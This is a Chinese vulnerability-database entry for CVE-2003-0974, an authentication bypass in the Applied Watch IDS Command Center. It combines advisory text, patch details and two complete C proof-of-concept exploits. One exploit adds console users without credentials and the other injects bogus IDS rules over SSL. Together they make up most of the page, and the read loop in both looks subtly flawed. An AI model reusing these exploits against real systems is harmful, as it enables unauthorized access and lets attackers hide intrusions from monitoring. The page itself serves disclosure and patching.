CVE-2003-0974
CVSS7.5
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:39
NMCOES    

[原文]Applied Watch Command Center allows remote attackers to conduct unauthorized activities without authentication, such as (1) add new users to a console, as demonstrated using appliedsnatch.c, or (2) add spurious IDS rules to sensors, as demonstrated using addrule.c.


[CNNVD]Applied Watch Command Center验证绕过漏洞(CNNVD-200312-027)

        
        Applied Watch是一款IDS解决方案。
        Applied Watch IDS系统存在安全问题,远程攻击者可以利用这个漏洞增加新帐户到控制台或者增加恶意规则。
        Applied Watch Command Center允许远程攻击者构建恶意请求,绕过验证,进行各种恶意操作,如在控制台上增加用户,在探测器上增加恶意IDS规则等。成功利用此漏洞可控制IDS系统或者伪造IDS警告信息。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0974
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0974
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-027
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107004362416252&w=2
(UNKNOWN)  BUGTRAQ  20031128 Multiple Remote Issues in Applied Watch IDS Suite (advisory attached)
http://marc.info/?l=bugtraq&m=107005523025918&w=2
(UNKNOWN)  BUGTRAQ  20031128 Applied Watch Response to Bugtraq.org post - Was: Multiple Remote Issues in Applied Watch IDS Suite
http://marc.info/?l=bugtraq&m=107031196324376&w=2
(UNKNOWN)  BUGTRAQ  20031201 Re: Multiple Remote Issues in Applied Watch IDS Suite (advisory attached)
http://www.bugtraq.org/advisories/_BSSADV-0000.txt
(UNKNOWN)  MISC  http://www.bugtraq.org/advisories/_BSSADV-0000.txt
http://www.securityfocus.com/bid/9124
(VENDOR_ADVISORY)  BID  9124

- 漏洞信息

Applied Watch Command Center验证绕过漏洞
高危 访问验证错误
2003-12-15 00:00:00 2005-10-20 00:00:00
远程  
        
        Applied Watch是一款IDS解决方案。
        Applied Watch IDS系统存在安全问题,远程攻击者可以利用这个漏洞增加新帐户到控制台或者增加恶意规则。
        Applied Watch Command Center允许远程攻击者构建恶意请求,绕过验证,进行各种恶意操作,如在控制台上增加用户,在探测器上增加恶意IDS规则等。成功利用此漏洞可控制IDS系统或者伪造IDS警告信息。
        

- 公告与补丁

        厂商补丁:
        Applied Watch Technologies
        --------------------------
        Applied Watch Command Center version 1.4.5已经修正此漏洞:
        https://my.appliedwatch.com

- 漏洞信息 (23404)

Applied Watch Command Center 1.0 Authentication Bypass Vulnerability (1) (EDBID:23404)
multiple remote
2003-11-28 Verified
0 Bugtraq Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/9124/info

A vulnerability has been identified in the system that may allow an attacker to bypass authentication to add attacker supplied IDS alerts and new user accounts in the console. Successful exploitation of these issues may allow an attacker to gain unauthorized access to a vulnerable system or conceal intrusion attempts.

Proof of concept exploits have been made available for this issue. 

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
        {\
          buf[(i) ++] = ((val) >> 24) & 0xff;\
          buf[(i) ++] = ((val) >> 16) & 0xff;\
          buf[(i) ++] = ((val) >> 8) & 0xff;\
          buf[(i) ++] = (val) & 0xff;\
        }

int main(int argc, char *argv[])
{
  unsigned char *buf;
  unsigned int idx, i;
  size_t userlen, passlen, buflen, lenidx;
  int sock;
  struct sockaddr_in sin;
  unsigned char respbuf[28];
  ssize_t n;
  SSL_CTX *sslctx;
  SSL *ssl;

  if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> 
<pass>\n", argv[0]); exit(1); }
  userlen = strlen(argv[3]);
  passlen = strlen(argv[4]);
  buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);
  memset(buf, 0, buflen);
  idx = 0;
  PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
  PUT_UINT32(idx, 0x6a);
  lenidx = idx;
  PUT_UINT32(idx, 0xf00fc7c8);
  //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
  PUT_UINT32(idx, userlen);
  memcpy(&buf[idx], argv[3], userlen); idx += userlen;
  idx |= 3; idx ++;
  PUT_UINT32(idx, passlen);
  memcpy(&buf[idx], argv[4], passlen); idx += passlen;
  idx |= 3; idx ++;
  PUT_UINT32(idx, 0x1);
  PUT_UINT32(idx, 0x1);
  PUT_UINT32(lenidx, idx);
  printf("connecting\n");
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(atoi(argv[2]));
  if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
  {
    struct hostent *he;

    if ((he = gethostbyname(argv[1])) == NULL) { 
perror("gethostbyname()"); exit(1); }
    memcpy(&sin.sin_addr, he->h_addr, 4);
  }
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { 
perror("connect()"); exit(1); }
  printf("doing ssl handshake\n");
  SSL_load_error_strings();
  SSL_library_init();
  if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { 
fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
  if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); 
exit(1); }
  if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); 
exit(1); }
  if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); 
exit(1); }
  printf("sending %u bytes:\n", idx);
  for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
  if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
  printf("\nreading:\n");
  i = 0;
  while (i < sizeof(respbuf))
  {
    if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { 
perror("read()"); exit(1); }
    i -= n;
  }
  for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
  printf("\n");
  printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], 
(memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : 
"failed");
  SSL_shutdown(ssl);
  close(sock);
  return 0;
}


		

- 漏洞信息 (23405)

Applied Watch Command Center 1.0 Authentication Bypass Vulnerability (2) (EDBID:23405)
multiple remote
2003-11-28 Verified
0 Bugtraq Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/9124/info
 
A vulnerability has been identified in the system that may allow an attacker to bypass authentication to add attacker supplied IDS alerts and new user accounts in the console. Successful exploitation of these issues may allow an attacker to gain unauthorized access to a vulnerable system or conceal intrusion attempts.
 
Proof of concept exploits have been made available for this issue. 

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
        {\
          buf[(i) ++] = ((val) >> 24) & 0xff;\
          buf[(i) ++] = ((val) >> 16) & 0xff;\
          buf[(i) ++] = ((val) >> 8) & 0xff;\
          buf[(i) ++] = (val) & 0xff;\
        }

int main(int argc, char *argv[])
{
  unsigned char *buf;
  unsigned int idx, i;
  size_t rulelen, buflen, lenidx;
  int sock;
  struct sockaddr_in sin;
  unsigned char respbuf[28];
  ssize_t n;
  SSL_CTX *sslctx;
  SSL *ssl;
  unsigned char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* 
*GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";

  if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); 
exit(1); }
  rulelen = strlen(ruleset);
  buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);
  memset(buf, 0, buflen);
  idx = 0;
  PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
  PUT_UINT32(idx, 0x6f);
  lenidx = idx;
  PUT_UINT32(idx, 0xf00fc7c8);
  //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
  PUT_UINT32(idx, 0);
  PUT_UINT32(idx, 1);
  PUT_UINT32(idx, rulelen);
  memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
  idx |= 3; idx ++;
  PUT_UINT32(lenidx, idx);
  printf("connecting\n");
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(atoi(argv[2]));
  if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
  {
    struct hostent *he;

    if ((he = gethostbyname(argv[1])) == NULL) { 
perror("gethostbyname()"); exit(1); }
    memcpy(&sin.sin_addr, he->h_addr, 4);
  }
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { 
perror("connect()"); exit(1); }
  printf("doing ssl handshake\n");
  SSL_load_error_strings();
  SSL_library_init();
  if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { 
fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
  if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); 
exit(1); }
  if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); 
exit(1); }
  if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); 
exit(1); }
  printf("sending %u bytes:\n", idx);
  for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
  if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
  printf("\nreading:\n");
  i = 0;
  while (i < sizeof(respbuf))
  {
    if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { 
perror("read()"); exit(1); }
    i -= n;
  }
  for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
  printf("\n");
  printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], 
"\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
  SSL_shutdown(ssl);
  close(sock);
  return 0;
}


		

- 漏洞信息

2882
Applied Watch Server Unauthenticated New User Addition

- 漏洞描述

Applied Watch Server contains a flaw that may allow a malicious user to add new users to the console without authentication. This action could compromise the integrity and confidentiality of the entire network.

- 时间线

2003-11-27 Unknow
2003-11-27 Unknow

- 解决方案

Upgrade to version 1.4.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Applied Watch Command Center Authentication Bypass Vulnerability
Access Validation Error 9124
Yes No
2003-11-28 12:00:00 2009-07-12 12:56:00
The disclosure of these issue has been credited to Bugtraq Security Systems <research@bugtraq.org>.

- 受影响的程序版本

Applied Watch Technologies Applied Watch Command Center 1.0

- 漏洞讨论

A vulnerability has been identified in the system that may allow an attacker to bypass authentication to add attacker supplied IDS alerts and new user accounts in the console. Successful exploitation of these issues may allow an attacker to gain unauthorized access to a vulnerable system or conceal intrusion attempts.

Proof of concept exploits have been made available for this issue.

- 漏洞利用

Exploit code has been provided.

- 解决方案

It has been reported that the vendor has released Applied Watch Command Center version 1.4.5 to address these issues. Users are advised to download the fixed version from the following web page:

https://my.appliedwatch.com

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站